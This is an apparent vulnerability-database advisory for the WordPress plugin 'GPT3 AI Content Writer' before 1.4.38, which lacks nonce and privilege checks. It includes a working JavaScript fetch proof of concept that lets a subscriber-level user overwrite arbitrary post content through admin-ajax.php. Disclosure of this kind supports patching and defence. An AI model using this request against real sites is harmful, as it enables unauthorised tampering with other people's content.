Lucene search

K
wpexploitLana CodesWPEX-ID:3CA9AC21-2BCE-4480-9079-B4045B261273
HistoryJan 19, 2023 - 12:00 a.m.

GPT3 AI Content Writer < 1.4.38 - Subscriber+ Arbitrary Post Content Update

2023-01-1900:00:00
Lana Codes
201
ai content writer
security issue
arbitrary post update

EPSS

0.001

Percentile

25.5%

The plugin does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wpaicg_set_post_content_&post_id=1&content=CHANGED',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

EPSS

0.001

Percentile

25.5%

Related for WPEX-ID:3CA9AC21-2BCE-4480-9079-B4045B261273